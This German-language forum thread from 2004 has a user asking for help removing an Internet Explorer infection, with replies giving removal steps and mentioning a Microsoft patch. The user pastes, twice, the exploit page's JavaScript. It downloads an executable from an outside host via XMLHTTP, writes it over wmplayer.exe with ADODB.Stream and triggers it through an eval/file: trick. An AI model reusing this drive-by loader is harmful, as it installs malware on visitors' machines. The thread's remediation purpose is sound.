[HaBo]

JackyDOS · 21.06.04, 21:12

Hallöchen,

mir bereitet seit ein paar Stunden ein folgendes Problem Kopfschmerzen.

Offenbar ist es über IE möglich sich ein nettes Tool, vermutlich php-basierend zu catchen, das unter spy-botfinder als Doit-exploit läuft. Vermutlich legt sich das Ding mit der Norton-Wall an, und hat dort seine exe versteckt *ich versuche den logischen aspekt zu finden*, da beim Löschen zwar die datei an sich gelöscht wird, jedoch reproduziert sich dat fuckin teil dauernd. Wie gesagt es setzt sich essentiell an IE fest, und ich vermute fast, dass es auch mit der Norton Wall zusammenhängt.

Habe mir mal folgendes zur Hilfe genommen:

textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://the-invincible.fateback.com/jan.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Programme\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>

Testing arround the corner... wait 10 secondes... says the_invincible
<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}

window.open("ieerror.php","_media");

setTimeout("doit()", 5000);

</script>

und es klingt für mich völlig plausibel. Wobei der mediaplayer vermutlich auch durch variable norton oder ähnlichen ersetzt werden kann.

Vielleicht hat ja einer von Euch eine Idee, wie ich das runterbringe, ohne dass ich erstmal den Rechner (der nedmal mein eigener ist) plattmachen muss.

Greetings,

lestat · 21.06.04, 23:39

hi,
sowie es aussieht läd sich das teil selbst runter und kopiert sich an stelle des mediaplayers

dann wird ein mediaplayer stream oder ähnliches aufgerufen um den mediaplayer zu starten welcher ja nun der wurm/virus oder was auch immer ist.

ich nenne es einfachheitshalber ab nun einfach "virus"

um das ding wegzukriegen solltest du dir von microsoft erstmal ein paar patches für den i-explorer runterladen um die sicherheitslücke zu schließén

1.schritt des entfernens. du musst den laufenden virus erstmal beenden damit er sich löschen läst. also in den taskmanager ( strg+alt+entf) -> prozesse und dort nach dem namen von dem teil suchen (warscheinlich wmplayer.exe) und das ding beenden.

wenns wiederkommt hast du ein problem
für den fall würd ichs mal versuchen im abgesicherten modus zu booten (gibts den beim xp überhaupt noch?) dort sind normalerweise alle autostart funktionen deaktiviert und so solltest du dann die mediaplayer.exe löschen können
den mediaplayer musste dir dann eben neu runterladen oder dir die exe von nem bekannten wiederholen.

die autostarteinträge von dem ding musst du natürlich auch löschen
einmal start->programme-> autostart

dann start-> ausführen -> regedit[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
(ps. alle ordner die mit RUN beginnen sind relevant)

dort nach dem dateinamen suchen für die sich der virus ausgibt

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run]
(ps. alle ordner die mit RUN beginnen sind relevant)

dort nach dem dateinamen suchen für die sich der virus ausgibt

wenn du pech hast trägt er sich auch noch als dienst ein

rechtsklick arbeitsplatz -> verwalten -> dienste

oder er trägt sich noch fieser ein aber das wäre jetzt zu ausführlich

wobei ich aber nicht glaube das dieser virus sich nur unter einem dateinamen versteckt sondern mehrere kopien von sich erstellt

aber wird der virus nicht von deiner anti virensoftware erkannt??

Anzeige

- Anzeige -

JackyDOS · 22.06.04, 00:14

danke ,

ich glaube der exploit gibt sich auch gerne als norton fake datei aus. Oder?

kp1 · 05.07.04, 00:49

Ggegen diesen "ADODB" Exploit hat Microsoft vor kurzem nen Patch rasugebracht (speziell für den Internet Explorer). Nur mal so.

Ach und ich würd den Code da oben wegnehmen oder du lässt hier viele Kids auf ganz dumme Gedanken kommen ;-)

Anzeige

- Anzeige -

21.06.04, 21:12	#1 (permalink)
JackyDOS Registriert seit: 21.06.04 Likes: 0	Doit Exploit Anzeige Hallöchen, mir bereitet seit ein paar Stunden ein folgendes Problem Kopfschmerzen. Offenbar ist es über IE möglich sich ein nettes Tool, vermutlich php-basierend zu catchen, das unter spy-botfinder als Doit-exploit läuft. Vermutlich legt sich das Ding mit der Norton-Wall an, und hat dort seine exe versteckt ich versuche den logischen aspekt zu finden, da beim Löschen zwar die datei an sich gelöscht wird, jedoch reproduziert sich dat fuckin teil dauernd. Wie gesagt es setzt sich essentiell an IE fest, und ich vermute fast, dass es auch mit der Norton Wall zusammenhängt. Habe mir mal folgendes zur Hilfe genommen: textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://the-invincible.fateback.com/jan.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Programme\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </textarea> Testing arround the corner... wait 10 secondes... says the_invincible <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media"); } window.open("ieerror.php","_media"); setTimeout("doit()", 5000); </script> und es klingt für mich völlig plausibel. Wobei der mediaplayer vermutlich auch durch variable norton oder ähnlichen ersetzt werden kann. Vielleicht hat ja einer von Euch eine Idee, wie ich das runterbringe, ohne dass ich erstmal den Rechner (der nedmal mein eigener ist) plattmachen muss. Greetings,

22.06.04, 00:14	#3 (permalink)
JackyDOS Themenstarter Registriert seit: 21.06.04 Likes: 0	RE: Doit Exploit danke , ich glaube der exploit gibt sich auch gerne als norton fake datei aus. Oder?

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Exploit Aim	devnull	(In)security allgemein	5	27.10.05 18:20
exploit	OmeGA	Virenschutz · Tools & Aggressive Software	14	27.12.04 00:47
Exploit	dbz42	Code Kitchen	0	07.06.04 18:13
WKS Exploit	gangstasta	Code Kitchen	3	09.03.04 19:08

21.06.04, 23:39	#2 (permalink)
lestat Registriert seit: 08.06.04 Likes: 0	hi, sowie es aussieht läd sich das teil selbst runter und kopiert sich an stelle des mediaplayers dann wird ein mediaplayer stream oder ähnliches aufgerufen um den mediaplayer zu starten welcher ja nun der wurm/virus oder was auch immer ist. ich nenne es einfachheitshalber ab nun einfach "virus" um das ding wegzukriegen solltest du dir von microsoft erstmal ein paar patches für den i-explorer runterladen um die sicherheitslücke zu schließén 1.schritt des entfernens. du musst den laufenden virus erstmal beenden damit er sich löschen läst. also in den taskmanager ( strg+alt+entf) -> prozesse und dort nach dem namen von dem teil suchen (warscheinlich wmplayer.exe) und das ding beenden. wenns wiederkommt hast du ein problem für den fall würd ichs mal versuchen im abgesicherten modus zu booten (gibts den beim xp überhaupt noch?) dort sind normalerweise alle autostart funktionen deaktiviert und so solltest du dann die mediaplayer.exe löschen können den mediaplayer musste dir dann eben neu runterladen oder dir die exe von nem bekannten wiederholen. die autostarteinträge von dem ding musst du natürlich auch löschen einmal start->programme-> autostart dann start-> ausführen -> regedit[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] (ps. alle ordner die mit RUN beginnen sind relevant) dort nach dem dateinamen suchen für die sich der virus ausgibt [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run] (ps. alle ordner die mit RUN beginnen sind relevant) dort nach dem dateinamen suchen für die sich der virus ausgibt wenn du pech hast trägt er sich auch noch als dienst ein rechtsklick arbeitsplatz -> verwalten -> dienste oder er trägt sich noch fieser ein aber das wäre jetzt zu ausführlich wobei ich aber nicht glaube das dieser virus sich nur unter einem dateinamen versteckt sondern mehrere kopien von sich erstellt aber wird der virus nicht von deiner anti virensoftware erkannt??

05.07.04, 00:49	#4 (permalink)
kp1 Registriert seit: 28.06.04 Likes: 0	Ggegen diesen "ADODB" Exploit hat Microsoft vor kurzem nen Patch rasugebracht (speziell für den Internet Explorer). Nur mal so. Ach und ich würd den Code da oben wegnehmen oder du lässt hier viele Kids auf ganz dumme Gedanken kommen ;-)

[HaBo]

Doit Exploit